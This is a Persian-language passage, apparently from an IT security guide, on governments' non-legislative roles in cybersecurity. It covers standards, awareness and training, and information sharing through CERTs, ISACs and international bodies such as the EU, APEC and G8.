‫ﺗﻬﻴــﺔ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﻣﻌﻴــﺎﺭﻫــﺎ‪ ،‬ﺁﺯﻣﻮﻧﻬــﺎ ﻭ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ‬
‫ﺍﻋﺘﺒﺎﺭﺳﻨﺠﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ‪ ،‬ﺍﻧﺪﺍﺯﻩ ﮔﻴﺮﻱ ﻭ ﺍﺭﺯﺷﻴﺎﺑﻲ ﺍﻣﻨﻴـﺖ‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺳﺮﻭﻳﺴﻬﺎ؛‬
‫•‬
‫ﺗﺄﻣﻴﻦ ﺣﺪﺍﻗﻞ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺩﻭﻟﺖ؛‬
‫•‬
‫ﺍﺭﺍﺋﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦﻛﺮﺩﻥ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻃﺮﺍﺣﻲ‪،‬‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ‪ ،‬ﻣﺪﻳﺮﻳﺖ‪ ،‬ﻭ ﻧﻴﺰ ﻋﻤﻠﻴﺎﺕ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ؛‬
‫ﺩﺭ ﺍﻧﺘﺸﺎﺭ ﻋﻤﻮﻣﻲ ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﻧﻮﻋﻲ ﺑﺮ ﻣﻴﻞ ﺧﻮﺩ ﺑﻪ ﻣﺨﻔﻲﻛﺎﺭﻱ ﻏﻠﺒﻪ ﻛﻨﻨﺪ‪ .‬ﻳﻚ ﻣﺜﺎﻝ ﺧﻮﺏ‬
‫ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ‪ ،‬ﺳـﺎﺯﻣﺎﻥ ﻓـﻮﻕ ﺳـﺮﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ﺩﺭ ﺍﻳـﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻫﻤﮕﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻋﻤﻮﻣﻲ ﺳﺎﺯﻣﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ‪ -‬ﺩﻭﻟﺖ ﻫﻤﭽﻨﻴﻦ ﻳﻜـﻲ ﺍﺯ ﺗـﺼﻤﻴﻢﮔﻴﺮﻧـﺪﮔﺎﻥ‬
‫ﻣﻬــﻢ ﺩﺭ ﺗﻌﻴــﻴﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﺍﺳــﺖ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﻏﻴﺮ ﺗﻘﻨﻴﻨﻲ‪ ،‬ﺩﺍﻭﻃﻠﺒﺎﻧﻪ ﻭ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﺘﺨﺼﺼﺎﻥ ﺩﻭﻟﺘﻲ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺍﻳﻦ‬
‫ﺯﻣﻴﻨﻪ ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ‪ -‬ﺑﻮﻳﮋﻩ ﺍﮔـﺮ ﺩﻭﻟـﺖ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﺣﻤﺎﻳﺖ ﻛﻨﺪ‪.‬‬
‫ﺁﮔﺎﻫﻲ‪ ،‬ﺁﻣﻮﺯﺵ ﻭ ﻇﺮﻓﻴﺖ ﺳﺎﺯﻱ‪ :‬ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻧﻘﺸﻬﺎﻱ‬
‫ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟﺖ‪ ،‬ﺁﻣﻮﺯﺵ ﻋﻤـﻮﻣﻲ ﻭ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﺑﺨـﺸﻬﺎﻱ‬
‫ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﺁﮔـﺎﻫﻲ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ ﻭ‬
‫ﺭﻭﺷﻬﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺳﺖ‪ .‬ﻣﻄﺎﻟﻌﺎﺕ ﻣﻮﺭﺩﻱ ﻭ ﮔﺰﺍﺭﺷﻬﺎﻳﻲ ﻣﺎﻧﻨﺪ‬
‫ﺁﻧﭽﻪ ﻛﻪ ﭘﻴﺸﺘﺮ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻧﺪ‪ ،‬ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺍﻳـﻦ‬
‫ﻫﺪﻑ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺍﺯ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﺧﻮﺍﺳـﺘﻪ ﻛـﻪ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﺩﻭﻟﺘﻬﺎ ﺑﺘﺪﺭﻳﺞ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺗﺨـﺎﺫ ﻛﻨﻨـﺪ ﻛـﻪ‬
‫ﺑﻄﻮﺭ ﺧﺎﺹ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﻣﺪ ﻧﻈـﺮ‬
‫ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷـﺎﻣﻞ ﺗﻄﺒﻴـﻖ ﺳـﺎﻳﺮ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺳﺎﺯﮔﺎﺭ ﺷﺪﻥ ﺑـﺎ ﻣـﺴﺎﺋﻞ ﺣـﻮﺯﺓ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﺑﺸﻮﺩ‪ .‬ﺗﺠﺮﺑﻪ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻛﻪ ﻳـﻚ ﺷـﺮﻁ ﻛﻠﻴـﺪﻱ‬
‫ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﻱ ﻣﻮﻓــﻖ ‪ ،‬ﻣﺤــﺪﻭﺩ ﻛــﺮﺩﻥ ﻗــﻮﺍﻧﻴﻦ ﺑــﻪ ﺷــﺮﺍﻳﻂ ﻭ‬
‫ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﺧﺎﺹ ﺍﺳﺖ‪ .‬ﺑﺎ ﺩﺭﻧﻈﺮ ﮔـﺮﻓﺘﻦ ﺍﻳـﻦ ﻧﻜﺘـﻪ‪ ،‬ﺩﻭﻟﺘﻬـﺎ‬
‫ﻭﻇﺎﻳﻒ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﻭﻥ ﻧﮕﺎﻩ ﺧـﺎﺹ ﺑـﻪ ﻓﻨـﺎﻭﺭﻱ ﻳـﺎ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺗﻌﻴﻴﻦ ﻧﻤﻮﺩﻩﺍﻧﺪ‪ .‬ﺩﺭ ﺍﺭﻭﭘﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺩﺭ ﺭﻫﻨﻤﻮﺩ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩ‪ ٧٠‬ﺑﺮ ﻋﻬـﺪﺓ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎ ﮔﺬﺍﺷـﺘﻪ‬
‫ﺷﺪﻩ ﻭ ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺟـﺰﺀ ﺛـﺎﺑﺘﻲ ﺍﺯ‬
‫ﻧﻴﺎﺯﻫﺎﻱ ﺑﺨﺶ ﻣﺎﻟﻲ ﻗﻠﻤﺪﺍﺩ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﻃـﻲ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ‪،‬‬
‫ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ‬
‫ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﺻﻨﻌﺖ ﺑﻬﺪﺍﺷـﺖ ﺭﺍ ﺑﻄـﻮﺭ ﺷـﻔﺎﻑ ﺗﻌﺮﻳـﻒ‬
‫ﻧﻤﻮﺩﻩﺍﻧﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﻄﻮﺭ ﻣﻔﺼﻞ ﺗﺸﺮﻳﺢ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺍﻣﺎ‬
‫ﺍﺑﺘﺪﺍ ﺑﻪ ﺑﺮﺧﻲ ﻧﻘﺸﻬﺎﻱ ﻣﻬﻢ ﺩﻭﻟﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬
‫ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﻫﻤﮕﻲ ﻏﻴﺮ ﺍﺯ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻫﺴﺘﻨﺪ‪.‬‬
‫•‬
‫ﺍﻓــﺰﺍﻳﺶ ﺁﮔــﺎﻫﻲ ﺩﺭﺑــﺎﺭﺓ ﺧﻄــﺮﺍﺕ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ‪،‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎﻱ ﺣﻔﺎﻇﺘﻲ؛‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٤٦‬‬
‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻨﺪ ﻛﻪ ﻫﻤﺔ‬
‫ﻃﻴﻔﻬــﺎﻱ ﻣﺨــﺎﻃﺒﻴﻦ ﺭﺍ ﺩﺭ ﺑــﺮ ﺑﮕﻴــﺮﺩ‪ .‬ﺍﺭﺍﺋــﻪ ﮔﺰﺍﺭﺷــﻬﺎ ﻭ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺑﻪ ﻣﺠﺎﻣﻊ ﻣﺘﺨﺼﺼﻴﻦ ﺩﺭ ﺍﻓﺰﺍﻳﺶ ﺁﮔـﺎﻫﻲ‬
‫ﻣﺆﺛﺮ ﺍﺳﺖ‪ .‬ﺁﻣﻮﺯﺵ ﻫﻤﭽﻨـﻴﻦ ﺷـﺎﻣﻞ ﺑﻮﺭﺳـﻬﺎﻱ ﺗﺤـﺼﻴﻠﻲ ﻭ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻮﺳﻌﻪﺍﻱ ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺩﺍﻧﺶ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﻧﻴـﺰ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﺗﻮﺻﻴﻪ ﻛﺮﺩﻩ ﻛـﻪ‬
‫ﺗﻤﺮﻛﺰ ﺑﻴﺸﺘﺮ ﺩﻭﺭﻩﻫﺎ ﺭﺍ ﺑﺮ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻧﻘـﺸﻬﺎﻱ ﻣﻬـﻢ ﺩﻭﻟـﺖ‪،‬‬
‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺑﺎﺭﺓ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ‪،‬‬
‫ﺍﺧﻄﺎﺭ ﺩﺭ ﻣﻮﺭﺩ ﻭﻳﺮﻭﺳﻬﺎ ﻭ ﺣﻤـﻼﺕ ﺟﺪﻳـﺪ‪ ،‬ﺍﺭﺍﺋـﻪ ﭘﻴـﺸﻨﻬﺎﺩﺍﺕ‬
‫ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻼﺕ‪ ،‬ﻭﺻﻠﻪ ﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ٧٢‬ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺩﻭﻟﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺩﺟﺔ ﻣﺮﺍﻛﺰ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻧﻈﻴـﺮ‬
‫ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ )‪ ٧٣(CERT‬ﻭ ﻣﺮﺍﻛﺰ ﻫﻤﻜـﺎﺭﻱ‬
‫ﻛﻪ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﺮﭘﺎ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺗﺄﻣﻴﻦ ﺳﺎﺯﺩ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ‬
‫‪ CERT‬ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ ‪Carnegie Mellon‬‬
‫ﻳﻚ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻖ ﻭ ﺗﻮﺳﻌﺔ ﺩﻭﻟﺘﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺍﺋـﻪ ﻛﻤـﻚ‬
‫ﺑﻪ ﺍﺩﺍﺭﺓ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ‪ ،‬ﺍﻧﺘﺸﺎﺭ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪،‬‬
‫ﺗﺤﻘﻴﻖ ﺩﺭﺑﺎﺭﺓ ﺗﻐﻴﻴـﺮﺍﺕ ﺑﻠﻨـﺪﻣـﺪﺕ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺷـﺒﻜﻪﺍﻱ‪ ،‬ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﺁﻣـﻮﺯﺵ ﻧﺤـﻮﺓ ﺗﻬﻴـﺔ ﻃﺮﺣﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕـﺮﻱ ﻛـﻪ ‪ CERT‬ﺩﺭ‬
‫ﺁﻧﻬــﺎ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻋﺒﺎﺭﺗﻨــﺪ ﺍﺯ ﻣــﺎﻟﺰﻱ‪ ،‬ﮊﺍﭘــﻦ‪ ،‬ﺍﺳــﺘﺮﺍﻟﻴﺎ ﻭ ﻛــﺮﻩ‪.‬‬
‫‪ Mcert‬ﻳﻚ ﻣﺮﻛﺰ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺩﺭ ﺁﻟﻤﺎﻥ ﺍﺳﺖ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﻣﻴﺎﻥ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﻋﻤﻮﻣﻲ ﺭﺍ ﺗﻮﺳﻂ ﺍﻧﺠﻤﻦ ‪BITKOM ICT‬‬
‫ﺁﻟﻤﺎﻥ‪ ،‬ﻫﻔﺖ ﭘﺸﺘﻴﺒﺎﻥ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺻﻨﻌﺘﻲ ﻭ ﻧﻴﺰ ﺩﻭﻟـﺖ ﺍﻳـﻦ‬
‫ﻛﺸﻮﺭ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫ﺑﺘﺪﺭﻳﺞ ﺑـﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺑﻬﺘـﺮ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺳـﻄﺢ ﻣﻨﻄﻘـﻪﺍﻱ ﻭ‬
‫ﻓﺮﺍﻣﻨﻄﻘﻪﺍﻱ‪ ،‬ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﭼﻨﺪﻣﻠﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ‪ .‬ﻛﻤﻴﺴﻴﻮﻥ‬
‫ﺍﺭﻭﭘﺎ ﺩﺭ ﮊﻭﺋﻦ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻳـﻚ ﻣﻌﺎﻫـﺪﻩ ﺩﺭ ﺧـﺼﻮﺹ ﺗﻘﻮﻳـﺖ‬
‫‪ CERT‬ﺩﺭ ﺍﺭﻭﭘﺎ ﻭ ﻣﺸﺎﺭﻛﺖ ﺑﻬﺘﺮ ﺍﻋـﻀﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺁﻥ ﻣﺮﻛـﺰ‬
‫ﻣﻨﺘﺸﺮ ﻛﺮﺩ‪ .‬ﺩﺭ ﻓﻮﺭﻳﻪ ‪ ۲۰۰۳‬ﺍﻳﻦ ﻛﻤﻴﺴﻴﻮﻥ ﮔﺎﻡ ﻓﺮﺍﺗﺮﻱ ﻧﻬﺎﺩ ﻭ‬
‫ﺗــﺼﻤﻴﻢ ﺧــﻮﺩ ﻧــﺴﺒﺖ ﺑــﻪ ﺍﻳﺠــﺎﺩ ﺳــﺎﺯﻣﺎﻥ ﺍﻣﻨﻴــﺖ ﺷــﺒﻜﻪ ﻭ‬
‫ﺍﻃﻼﻋــﺎﺕ‪ ٧٤‬ﺭﺍ ﺍﻋــﻼﻡ ﻧﻤــﻮﺩ‪ APEC .‬ﺑﻤﻨﻈــﻮﺭ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ‬
‫‪ CERT‬ﻣﺤﻠــﻲ‪ ،‬ﺑــﺮﺍﻱ ﺁﻣــﻮﺯﺵ ﺩﺍﺧﻠــﻲ ﻛــﺸﻮﺭﻫﺎ ﻭ ﺗﻮﺳــﻌﻪ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳـﻦ ﻣﺮﻛـﺰ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﺔ ﻣﻨﻄﻘـﻪ‬
‫‪Security Patches‬‬
‫‪Computer Emergency Response Team‬‬
‫‪Network And Information Security Agency‬‬
‫‪72‬‬
‫‪73‬‬
‫‪74‬‬
‫ﭘﻴﺸﻘﺪﻡ ﺷﺪ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ‪ CERT‬ﺭﺍ ﺗﻬﻴﻪ ﻛﺮﺩ‪ .‬ﮔـﺮﻭﻩ ‪G8‬‬
‫ﻧﻴﺰ ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﻧﻘﺎﻁ ﺗﻤﺎﺱ ﺩﺍﺋﻤﻲ ﺍﻳﺠﺎﺩ ﻛـﺮﺩ ﺗـﺎ ﻫﻤﻜـﺎﺭﻱ ﻭ‬
‫ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗـﺴﻬﻴﻞ ﺷـﻮﺩ؛ ﻭ‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﻭﻟﺘﻬﺎﻱ ﻏﻴﺮ ﻋﻀﻮ ﺩﺭ ﮔﺮﻭﻩ ‪ G8‬ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺩﺭ ﺁﻥ ﻣﺸﺎﺭﻛﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺩﻭﻟﺘﻬﺎﻱ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﺷﻜﺎﻝ‬
‫ﻣﺨﺘﻠــﻒ ﺩﺭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﻣﺆﺳــﺴﺎﺗﻲ ﺍﻳﺠــﺎﺩ ﻧﻤﺎﻳــﺪ ﻛــﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﺩﺍﻭﻃﻠﺒﺎﻧﺔ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻛﻨﻨـﺪ؛‬
‫ﻫﻤﭽﻮﻥ ﻣﺮﺍﻛﺰ ﺍﺷﺘﺮﺍﻙ ﻭ ﺗﺤﻠﻴﻞ ﺍﻃﻼﻋﺎﺕ )‪ .٧٥(ISAC‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﺜﺎﻝ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﺍﻱ ﺑﺨـﺸﻬﺎﻱ ﺧـﺎﺹ ﺻـﻨﻌﺖ )ﻫﻤﭽـﻮﻥ‬
‫ﺧﺪﻣﺎﺕ ﺑﺨـﺶ ﻣـﺎﻟﻲ‪ ،‬ﺑﺨـﺶ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺗﻠﻔﻨـﻲ ﻭ ﺻـﻨﻌﺖ ﻧﻴـﺮﻭﻱ ﺑـﺮﻕ(‬
‫‪ ISAC‬ﺗﺄﺳﻴﺲ ﻧﻤﻮﺩﻩ ﻭ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻣﺜﻞ ﻛﺎﻧﺎﺩﺍ‪ ،‬ﺁﻟﻤﺎﻥ‪ ،‬ﮊﺍﭘﻦ ﻭ‬
‫ﻫﻠﻨﺪ ﻧﻴﺰ ﺩﺍﺭﺍﻱ ‪ ISAC‬ﻣﻲﺑﺎﺷـﻨﺪ‪ .‬ﺍﻧﮕﻠـﺴﺘﺎﻥ ﺑـﺪﻧﺒﺎﻝ ﻣﻔﻬـﻮﻡ‬
‫‪) ٧٦WARP‬ﻫﺸﺪﺍﺭ‪ ،‬ﺗﻮﺻﻴﻪ ﻭ ﮔﺰﺍﺭﺵ ﻧﻜﺎﺕ( ﻣﻲﺑﺎﺷﺪ ‪ -‬ﻳﻚ ﺷﺒﻜﻪ‬
‫ﺳﺮﺍﺳﺮﻱ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺑﻬﺘﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﺗﻮﺻـﻴﻪﻫـﺎ ﻭ ﻫـﺸﺪﺍﺭﻫﺎﻱ‬
‫ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﻧﻴﺰ ﺩﺭﻳﺎﻓﺖ ﻛﺎﻣﻠﺘﺮ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺣـﻮﺍﺩﺙ‬
‫ﺩﺭ ﺁﻥ ﻛﺸﻮﺭ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺩﻭﻟﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﺑﻬﺘـﺮ ﺍﻃﻼﻋـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻛﻤﻴﺘﻪ ﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﻋﻤـﻮﻣﻲ ﺍﻳﺠـﺎﺩ ﻛﻨـﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻧﻤﻮﻧـﻪ‬
‫‪٧٧‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﻤﻴﺘﺔ ﻣﺸﺎﻭﺭﺍﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻣﺨـﺎﺑﺮﺍﺕ )‪(NSTAC‬‬
‫ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﻣﺘـﺸﻜﻞ ﺍﺳـﺖ ﺍﺯ ﺳـﻲ ﻧﻤﺎﻳﻨـﺪﺓ ﻣﻬـﻢ ﺻـﻨﻌﺖ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ‪ ،‬ﺷـﺮﻛﺘﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋــﺎﺕ‪ ،‬ﻭ ﻣﻘﺎﻣــﺎﺕ ﻣــﺴﺌﻮﻝ ﺍﻣﻨﻴــﺖ ﻣﻠــﻲ ﻭ ﺳﻴــﺴﺘﻤﻬﺎﻱ‬
‫ﺍﺭﺗﺒـﺎﻃﻲ ﺍﺿـﻄﺮﺍﺭﻱ‪ NSTAC .‬ﻧﻴـﺰ ﻣـﺸﺎﻭﺭ ﺻـﻨﻌﺘﻲ ﺭﺋــﻴﺲ‬
‫ﺟﻤﻬﻮﺭ ﺩﺭ ﺧﺼﻮﺹ ﻣﺸﻜﻼﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﺁﻣـﺎﺩﮔﻲ‬
